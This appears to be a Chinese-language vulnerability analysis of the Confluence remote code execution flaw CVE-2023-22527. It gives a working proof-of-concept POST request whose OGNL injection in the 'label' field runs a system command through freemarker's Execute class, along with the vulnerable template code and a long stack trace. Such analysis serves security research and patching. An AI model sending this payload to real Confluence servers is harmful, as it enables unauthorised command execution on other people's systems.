CVE-2023-22527 - RCE Vulnerability In Confluence Data Center and Confluence Server
目录
注意
本文最后更新于 2024-03-01,文中内容可能已过时。
CVE-2023-22527 - RCE Vulnerability In Confluence Data Center and Confluence Server
PoC
POST /template/aui/text-inline.vm HTTP/1.1
Host: 192.168.11.136:8092
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 287
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
格式化后的 PoC
'+#request['.KEY_velocity.struts2.context'].
internalGet('ognl').
findValue(#parameters.x,{})
+'&x=@org.apache.struts2.ServletActionContext@getResponse().
setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
分析
PoC 参考:https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/
调用的关键方法在以下
org.apache.struts2.views.velocity.StrutsVelocityContext#internalGet
↓
org.apache.struts2.views.jsp.ui.OgnlTool#findValue
↓
freemarker.template.utility.Execute
↓
java.lang.Runtime#exec(java.lang.String)
漏洞点
#set( $labelValue = $stack.findValue("getText('$parameters.label')") )
#if( !$labelValue )
#set( $labelValue = $parameters.label )
#end
#if (!$parameters.id)
#set( $parameters.id = $parameters.name)
#end
<label id="${parameters.id}-label" for="$parameters.id">
$!labelValue
#if($parameters.required)
<span class="aui-icon icon-required"></span>
<span class="content">$parameters.required</span>
#end
</label>
#parse("/template/aui/text-include.vm")
分析
$stack.findValue("getText('$parameters.label')")
其他的都是类似。没有 getText 方法包围的。
radiolist.vm:40: #set( $itemValue = $stack.findValue($parameters.listValue) )
select.vm:19: #set( $itemKey = $stack.findValue($parameters.listKey) )
也就意味着,漏洞点的方法的调用和无漏洞点的方法调用是不一样的。
我们可以找到
调用链
exec:313, Runtime (java.lang)
exec:84, Execute (freemarker.template.utility)
invoke0:-1, NativeMethodAccessorImpl (jdk.internal.reflect)
invoke:62, NativeMethodAccessorImpl (jdk.internal.reflect)
invoke:43, DelegatingMethodAccessorImpl (jdk.internal.reflect)
invoke:566, Method (java.lang.reflect)
invokeMethodInsideSandbox:1266, OgnlRuntime (ognl)
invokeMethod:1251, OgnlRuntime (ognl)
callAppropriateMethod:1969, OgnlRuntime (ognl)
callMethod:68, ObjectMethodAccessor (ognl)
callMethodWithDebugInfo:98, XWorkMethodAccessor (com.opensymphony.xwork2.ognl.accessor)
callMethod:90, XWorkMethodAccessor (com.opensymphony.xwork2.ognl.accessor)
callMethod:2045, OgnlRuntime (ognl)
getValueBody:97, ASTMethod (ognl)
evaluateGetValueBody:212, SimpleNode (ognl)
getValue:258, SimpleNode (ognl)
getValueBody:141, ASTChain (ognl)
evaluateGetValueBody:212, SimpleNode (ognl)
getValue:258, SimpleNode (ognl)
getValueBody:94, ASTMethod (ognl)
evaluateGetValueBody:212, SimpleNode (ognl)
getValue:258, SimpleNode (ognl)
getValueBody:141, ASTChain (ognl)
evaluateGetValueBody:212, SimpleNode (ognl)
getValue:258, SimpleNode (ognl)
getValue:537, Ognl (ognl)
getValue:687, Ognl (ognl)
getValue:662, Ognl (ognl)
findValue:48, OgnlTool (org.apache.struts2.views.jsp.ui)
invoke0:-1, NativeMethodAccessorImpl (jdk.internal.reflect)
invoke:62, NativeMethodAccessorImpl (jdk.internal.reflect)
invoke:43, DelegatingMethodAccessorImpl (jdk.internal.reflect)
invoke:566, Method (java.lang.reflect)
invokeMethodInsideSandbox:1266, OgnlRuntime (ognl)
invokeMethod:1251, OgnlRuntime (ognl)
callAppropriateMethod:1969, OgnlRuntime (ognl)
callMethod:68, ObjectMethodAccessor (ognl)
callMethodWithDebugInfo:98, XWorkMethodAccessor (com.opensymphony.xwork2.ognl.accessor)
callMethod:90, XWorkMethodAccessor (com.opensymphony.xwork2.ognl.accessor)
callMethod:2045, OgnlRuntime (ognl)
getValueBody:97, ASTMethod (ognl)
evaluateGetValueBody:212, SimpleNode (ognl)
getValue:258, SimpleNode (ognl)
getValueBody:141, ASTChain (ognl)
evaluateGetValueBody:212, SimpleNode (ognl)
getValue:258, SimpleNode (ognl)
getValueBody:65, ASTAdd (ognl)
evaluateGetValueBody:212, SimpleNode (ognl)
getValue:258, SimpleNode (ognl)
getValueBody:94, ASTMethod (ognl)
evaluateGetValueBody:212, SimpleNode (ognl)
getValue:258, SimpleNode (ognl)
getValue:537, Ognl (ognl)
getValue:501, Ognl (ognl)
execute:523, OgnlUtil$2 (com.opensymphony.xwork2.ognl)
compileAndExecute:562, OgnlUtil (com.opensymphony.xwork2.ognl)
getValue:521, OgnlUtil (com.opensymphony.xwork2.ognl)
getValueUsingOgnl:297, OgnlValueStack (com.opensymphony.xwork2.ognl)
tryFindValue:280, OgnlValueStack (com.opensymphony.xwork2.ognl)
tryFindValueWhenExpressionIsNotNull:262, OgnlValueStack (com.opensymphony.xwork2.ognl)
findValue:242, OgnlValueStack (com.opensymphony.xwork2.ognl)
findValue:304, OgnlValueStack (com.opensymphony.xwork2.ognl)
invoke0:-1, NativeMethodAccessorImpl (jdk.internal.reflect)
invoke:62, NativeMethodAccessorImpl (jdk.internal.reflect)
invoke:43, DelegatingMethodAccessorImpl (jdk.internal.reflect)
invoke:566, Method (java.lang.reflect)
doInvoke:385, UberspectImpl$VelMethodImpl (org.apache.velocity.util.introspection)
invoke:374, UberspectImpl$VelMethodImpl (org.apache.velocity.util.introspection)
invoke:28, UnboxingMethod (com.atlassian.velocity.htmlsafe.introspection)
execute:270, ASTMethod (org.apache.velocity.runtime.parser.node)
execute:262, ASTReference (org.apache.velocity.runtime.parser.node)
value:507, ASTReference (org.apache.velocity.runtime.parser.node)
value:71, ASTExpression (org.apache.velocity.runtime.parser.node)
render:142, ASTSetDirective (org.apache.velocity.runtime.parser.node)
render:336, SimpleNode (org.apache.velocity.runtime.parser.node)
merge:328, Template (org.apache.velocity)
merge:235, Template (org.apache.velocity)
mergeTemplate:227, ConfluenceVelocityServlet (com.atlassian.confluence.servlet)
doRequest:175, ConfluenceVelocityServlet (com.atlassian.confluence.servlet)
doPost:133, ConfluenceVelocityServlet (com.atlassian.confluence.servlet)
service:555, HttpServlet (javax.servlet.http)
service:623, HttpServlet (javax.servlet.http)
internalDoFilter:209, ApplicationFilterChain (org.apache.catalina.core)
doFilter:153, ApplicationFilterChain (org.apache.catalina.core)
doFilter:51, WsFilter (org.apache.tomcat.websocket.server)
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core)
doFilter:153, ApplicationFilterChain (org.apache.catalina.core)
doFilter:63, DebugFilter (com.atlassian.confluence.web.filter)
doFilter:32, AbstractHttpFilter (com.atlassian.core.filters)
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core)
doFilter:153, ApplicationFilterChain (org.apache.catalina.core)
doFilter:39, IteratingFilterChain (com.atlassian.plugin.servlet.filter)
lambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter)
doFilter:-1, 2049116259 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2489)
doFilter:52, IncludeResourcesFilter (com.atlassian.confluence.plugins.baseurl)
doFilter:32, AbstractHttpFilter (com.atlassian.core.filters)
doFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter)
doFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter)
lambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter)
doFilter:-1, 2049116259 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2489)
doFilter:36, BotKillerFilter (com.atlassian.labs.botkiller)
doFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter)
doFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter)
lambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter)
doFilter:-1, 2049116259 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2489)
doFilter:24, ContextFilter (com.atlassian.applinks.core.rest.context)
doFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter)
doFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter)
lambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter)
doFilter:-1, 2049116259 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2489)
doFilter:24, ContextFilter (com.atlassian.applinks.core.rest.context)
doFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter)
doFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter)
lambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter)
doFilter:-1, 2049116259 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2489)
doFilter:24, ContextFilter (com.atlassian.applinks.core.rest.context)
doFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter)
doFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter)
lambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter)
doFilter:-1, 2049116259 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2489)
doFilter:24, ContextFilter (com.atlassian.applinks.core.rest.context)
doFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter)
doFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter)
lambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter)
doFilter:-1, 2049116259 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2489)
doFilter:24, ContextFilter (com.atlassian.applinks.core.rest.context)
doFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter)
doFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter)
lambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter)
doFilter:-1, 2049116259 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2489)
doFilter:75, PulpFilter (com.atlassian.confluence.plugins.pulp)
doFilter:32, AbstractHttpFilter (com.atlassian.core.filters)
doFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter)
doFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter)
lambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter)
doFilter:-1, 2049116259 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2489)
doFilter:75, UniversalAnalyticsFilter (com.atlassian.analytics.client.filter)
doFilter:33, AbstractHttpFilter (com.atlassian.analytics.client.filter)
doFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter)
doFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter)
lambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter)
doFilter:-1, 2049116259 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2489)
doFilter:32, ServingRequestsFilter (com.atlassian.mywork.client.filter)
doFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter)
doFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter)
lambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter)
doFilter:-1, 2049116259 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2489)
doFilter:77, OnboardingFilter (com.atlassian.confluence.efi)
doFilter:32, AbstractHttpFilter (com.atlassian.core.filters)
doFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter)
doFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter)
lambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter)
doFilter:-1, 2049116259 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2489)
doFilter:32, PrettyUrlsSiteMeshFixupFilter (com.atlassian.prettyurls.filter)
doFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter)
doFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter)
lambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter)
doFilter:-1, 2049116259 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2489)
doFilter:55, PrettyUrlsDispatcherFilter (com.atlassian.prettyurls.filter)
doFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter)
doFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter)
lambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter)
doFilter:-1, 2049116259 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2489)
doFilter:80, PrettyUrlsSiteMeshFilter (com.atlassian.prettyurls.filter)
doFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter)
doFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter)
lambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter)
doFilter:-1, 2049116259 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2489)
doFilter:51, PrettyUrlsMatcherFilter (com.atlassian.prettyurls.filter)
doFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter)
doFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter)
lambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter)
doFilter:-1, 2049116259 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2489)
doFilter:72, MobileAppWebViewFilter (com.atlassian.confluence.plugins.mobile.filter)
doFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter)
doFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter)
doFilter:56, ServletFilterModuleContainerFilter (com.atlassian.plugin.servlet.filter)
doFilter:44, ServletFilterModuleContainerFilter (com.atlassian.plugin.servlet.filter)
doFilter:50, JohnsonServletFilterModuleContainerFilter (com.atlassian.johnson.plugin.servlet.filter)
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core)
doFilter:153, ApplicationFilterChain (org.apache.catalina.core)
doFilter:64, MessagesDecoratorFilter (com.atlassian.confluence.util.message)
doFilter:32, AbstractHttpFilter (com.atlassian.core.filters)
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core)
doFilter:153, ApplicationFilterChain (org.apache.catalina.core)
obtainContent:181, SiteMeshFilter (com.opensymphony.sitemesh.webapp)
doFilter:85, SiteMeshFilter (com.opensymphony.sitemesh.webapp)
doFilter:48, ProfilingSiteMeshFilter (com.atlassian.confluence.util.profiling)
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core)
doFilter:153, ApplicationFilterChain (org.apache.catalina.core)
doFilter:39, IteratingFilterChain (com.atlassian.plugin.servlet.filter)
lambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter)
doFilter:-1, 2049116259 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2489)
doFilter:46, ReadWriteScopeFilter (com.atlassian.oauth2.scopes.web)
doFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter)
doFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter)
lambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter)
doFilter:-1, 2049116259 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2489)
doFilter:46, AbstractThreadNamingFilter (com.atlassian.troubleshooting.thready.filter)
doFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter)
doFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter)
lambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter)
doFilter:-1, 2049116259 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2489)
doFilter:39, ConfluenceActivityFilter (com.atlassian.confluence.util.profiling)
doFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter)
doFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter)
lambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter)
doFilter:-1, 2049116259 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2489)
doFilter:56, PrettyUrlsCombinedMatchDispatcherFilter (com.atlassian.prettyurls.filter)
doFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter)
doFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter)
doFilter:56, ServletFilterModuleContainerFilter (com.atlassian.plugin.servlet.filter)
doFilter:44, ServletFilterModuleContainerFilter (com.atlassian.plugin.servlet.filter)
doFilter:50, JohnsonServletFilterModuleContainerFilter (com.atlassian.johnson.plugin.servlet.filter)
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core)
doFilter:153, ApplicationFilterChain (org.apache.catalina.core)
doFilter:62, WebSudoFilter (com.atlassian.confluence.impl.webapp.sudo)
doFilter:53, HttpFilter (javax.servlet.http)
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core)
doFilter:153, ApplicationFilterChain (org.apache.catalina.core)
doFilter:96, StrutsPrepareFilter (org.apache.struts2.dispatcher.filter)
doFilter:66, ConfluenceStrutsPrepareFilter (com.atlassian.confluence.impl.struts)
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core)
doFilter:153, ApplicationFilterChain (org.apache.catalina.core)
doFilter:22, TransactionalCacheFactoryCleanupFilter (com.atlassian.confluence.cache)
doFilter:32, AbstractHttpFilter (com.atlassian.core.filters)
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core)
doFilter:153, ApplicationFilterChain (org.apache.catalina.core)
doFilter:17, ServletContextThreadLocalFilter (com.atlassian.core.filters)
doFilter:32, AbstractHttpFilter (com.atlassian.core.filters)
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core)
doFilter:153, ApplicationFilterChain (org.apache.catalina.core)
doFilter:31, UserLoggingContextFilter (com.atlassian.confluence.util)
doFilter:32, AbstractHttpFilter (com.atlassian.core.filters)
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core)
doFilter:153, ApplicationFilterChain (org.apache.catalina.core)
doFilter:25, UserNameHeaderFilter (com.atlassian.confluence.util)
doFilter:32, AbstractHttpFilter (com.atlassian.core.filters)
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core)
doFilter:153, ApplicationFilterChain (org.apache.catalina.core)
doFilterInternal:31, MauEventFilter (com.atlassian.confluence.web.filter)
doFilter:44, AbstractStaticResourceAwareFilter (com.atlassian.confluence.web.filter)
doFilter:32, AbstractHttpFilter (com.atlassian.core.filters)
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core)
doFilter:153, ApplicationFilterChain (org.apache.catalina.core)
doFilter:39, UserThreadLocalFilter (com.atlassian.confluence.util)
doFilter:32, AbstractHttpFilter (com.atlassian.core.filters)
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core)
doFilter:153, ApplicationFilterChain (org.apache.catalina.core)
doFilter:57, ConfluenceTimeoutFilter (com.atlassian.confluence.web.filter)
doFilter:32, AbstractHttpFilter (com.atlassian.core.filters)
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core)
doFilter:153, ApplicationFilterChain (org.apache.catalina.core)
doFilter:83, HttpSessionRegistrarFilter (com.atlassian.confluence.web.filter)
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core)
doFilter:153, ApplicationFilterChain (org.apache.catalina.core)
doFilter:242, SecurityFilter (com.atlassian.seraph.filter)
applyFilter:40, ConfluenceSecurityFilter (com.atlassian.confluence.web.filter)
doFilter:29, ConfluenceSecurityFilter (com.atlassian.confluence.web.filter)
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core)
doFilter:153, ApplicationFilterChain (org.apache.catalina.core)
doFilter:94, TrustedApplicationsFilter (com.atlassian.security.auth.trustedapps.filter)
doFilter:35, AbstractBootstrapHotSwappingFilter (com.atlassian.confluence.util)
doFilter:32, AbstractHttpFilter (com.atlassian.core.filters)
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core)
doFilter:153, ApplicationFilterChain (org.apache.catalina.core)
doFilter:148, BaseLoginFilter (com.atlassian.seraph.filter)
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core)
doFilter:153, ApplicationFilterChain (org.apache.catalina.core)
doFilter:39, IteratingFilterChain (com.atlassian.plugin.servlet.filter)
lambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter)
doFilter:-1, 2049116259 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2489)
doFilter:67, OAuthFilter (com.atlassian.oauth.serviceprovider.internal.servlet)
doFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter)
doFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter)
lambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter)
doFilter:-1, 2049116259 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2489)
doFilter:82, TokenBasedAuthenticationFilter (com.atlassian.pats.web.filter)
doFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter)
doFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter)
lambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter)
doFilter:-1, 2049116259 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2489)
doFilter:81, AccessTokenFilter (com.atlassian.oauth2.provider.core.web)
doFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter)
doFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter)
lambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter)
doFilter:-1, 2049116259 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2489)
doFilter:56, PrettyUrlsCombinedMatchDispatcherFilter (com.atlassian.prettyurls.filter)
doFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter)
doFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter)
doFilter:56, ServletFilterModuleContainerFilter (com.atlassian.plugin.servlet.filter)
doFilter:44, ServletFilterModuleContainerFilter (com.atlassian.plugin.servlet.filter)
doFilter:50, JohnsonServletFilterModuleContainerFilter (com.atlassian.johnson.plugin.servlet.filter)
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core)
doFilter:153, ApplicationFilterChain (org.apache.catalina.core)
doFilter:57, ClusterHeaderFilter (com.atlassian.confluence.util)
doFilter:32, AbstractHttpFilter (com.atlassian.core.filters)
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core)
doFilter:153, ApplicationFilterChain (org.apache.catalina.core)
doFilterInternal:156, OpenSessionInViewFilter (org.springframework.orm.hibernate5.support)
doFilterInternal:39, ConfluenceOpenSessionInViewFilter (com.atlassian.confluence.web.filter)
doFilter:117, OncePerRequestFilter (org.springframework.web.filter)
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core)
doFilter:153, ApplicationFilterChain (org.apache.catalina.core)
doFilter:24, ConfluenceErrorFilter (com.atlassian.confluence.util)
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core)
doFilter:153, ApplicationFilterChain (org.apache.catalina.core)
doFilter:104, ProfilingFilter (com.atlassian.util.profiling.filters)
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core)
doFilter:153, ApplicationFilterChain (org.apache.catalina.core)
doFilter:39, RequestTimeThreadLocalFilter (com.atlassian.confluence.core.datetime)
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core)
doFilter:153, ApplicationFilterChain (org.apache.catalina.core)
doFilter:20, ConfluenceVelocityFilter (com.atlassian.confluence.util)
doFilter:32, AbstractHttpFilter (com.atlassian.core.filters)
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core)
doFilter:153, ApplicationFilterChain (org.apache.catalina.core)
doFilter:31, AbstractCachingFilter (com.atlassian.core.filters.cache)
doFilter:32, AbstractHttpFilter (com.atlassian.core.filters)
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core)
doFilter:153, ApplicationFilterChain (org.apache.catalina.core)
doFilter:39, IteratingFilterChain (com.atlassian.plugin.servlet.filter)
lambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter)
doFilter:-1, 2049116259 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2489)
doFilter:70, DisableBasicAuthFilter (com.atlassian.plugins.authentication.impl.basicauth.filter)
doFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter)
doFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter)
lambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter)
doFilter:-1, 2049116259 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2489)
doFilter:26, DefaultAnalyticsFilter (com.atlassian.analytics.client.filter)
doFilter:33, AbstractHttpFilter (com.atlassian.analytics.client.filter)
doFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter)
doFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter)
lambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter)
doFilter:-1, 2049116259 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2489)
doFilter:37, JwtAuthFilter (com.atlassian.jwt.internal.servlet)
doFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter)
doFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter)
lambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter)
doFilter:-1, 2049116259 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2489)
doFilter:46, AbstractThreadNamingFilter (com.atlassian.troubleshooting.thready.filter)
doFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter)
doFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter)
lambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter)
doFilter:-1, 2049116259 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2489)
doFilter:58, HttpRequestStatsFilter (com.atlassian.confluence.web.filter)
doFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter)
doFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter)
lambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter)
doFilter:-1, 2049116259 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2489)
doFilterInternal:120, GzipFilter (com.atlassian.gzipfilter)
doFilter:91, GzipFilter (com.atlassian.gzipfilter)
doFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter)
doFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter)
lambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter)
doFilter:-1, 2049116259 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2489)
doFilter:47, ConfluenceTimingFilter (com.atlassian.confluence.web.filter)
doFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter)
doFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter)
lambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter)
doFilter:-1, 2049116259 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2489)
doFilter:56, PrettyUrlsCombinedMatchDispatcherFilter (com.atlassian.prettyurls.filter)
doFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter)
doFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter)
lambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter)
doFilter:-1, 2049116259 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2489)
doFilter:71, WebdavRequestForwardFilter (com.atlassian.confluence.extra.webdav.servlet.filter)
doFilter:29, AbstractHttpFilter (com.atlassian.confluence.extra.webdav.servlet.filter)
doFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter)
doFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter)
doFilter:56, ServletFilterModuleContainerFilter (com.atlassian.plugin.servlet.filter)
doFilter:44, ServletFilterModuleContainerFilter (com.atlassian.plugin.servlet.filter)
doFilter:50, JohnsonServletFilterModuleContainerFilter (com.atlassian.johnson.plugin.servlet.filter)
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core)
doFilter:153, ApplicationFilterChain (org.apache.catalina.core)
doFilter:36, MobileAppRequestFilter (com.atlassian.confluence.util)
doFilter:32, AbstractHttpFilter (com.atlassian.core.filters)
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core)
doFilter:153, ApplicationFilterChain (org.apache.catalina.core)
doFilter:59, IgnoreWebAsyncManagerFilter (com.atlassian.confluence.internal.web.filter.spring)
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core)
doFilter:153, ApplicationFilterChain (org.apache.catalina.core)
doFilter:51, RequestParamValidationFilter (com.atlassian.confluence.web.filter.validateparam)
doFilter:32, AbstractHttpFilter (com.atlassian.core.filters)
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core)
doFilter:153, ApplicationFilterChain (org.apache.catalina.core)
doFilter:39, TranslationModeFilter (com.atlassian.confluence.web.filter)
